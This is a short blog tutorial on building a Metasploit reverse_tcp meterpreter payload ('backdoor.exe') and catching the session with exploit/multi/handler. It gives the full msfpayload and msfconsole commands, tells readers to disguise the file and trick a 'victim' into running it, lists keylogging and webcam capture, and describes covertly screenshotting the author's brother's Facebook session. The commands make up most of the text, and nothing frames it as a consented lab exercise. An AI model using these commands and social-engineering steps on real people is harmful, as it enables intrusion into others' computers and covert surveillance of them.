Linux

Pawning Windows 7 Sp1 Box with Metasploit

tuxkilledwindows

In this tutorial we will exploit a Windows 7 Sp1 OS using Metasploit. We will be using the exploit/multi/handler module which “provides all of the features of the Metasploit payload system to exploits that have been launched  outside of the framework

Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the quotes:

msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe

I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is 192.168.10.5.

backdoor.exe

After that, you should be able to see a file named as backdoor.exe in /root. Send the file to the victim by using your Social Engineering skills and let him click the file. You can change the name of the file so that it is not that obvious.

Launch Metasploit and set the exploit by typing these commands in your msfconsole:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.10.5

set lport 4444

exploit

exploiting windows 7

If all goes well, you should be able to establish a meterpreter session. Type sysinfo to gather some info on the machine. To know other commands for the meterpreter type help. There are also other meterpreter commands like capturing the screenshot of the PC, record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.

Ohw, and because my brother is currently checking out his Facebook account, I decided to take a screenshot on his PC by using the meterpreter command screenshot.


facebook screenshot

Leave a Reply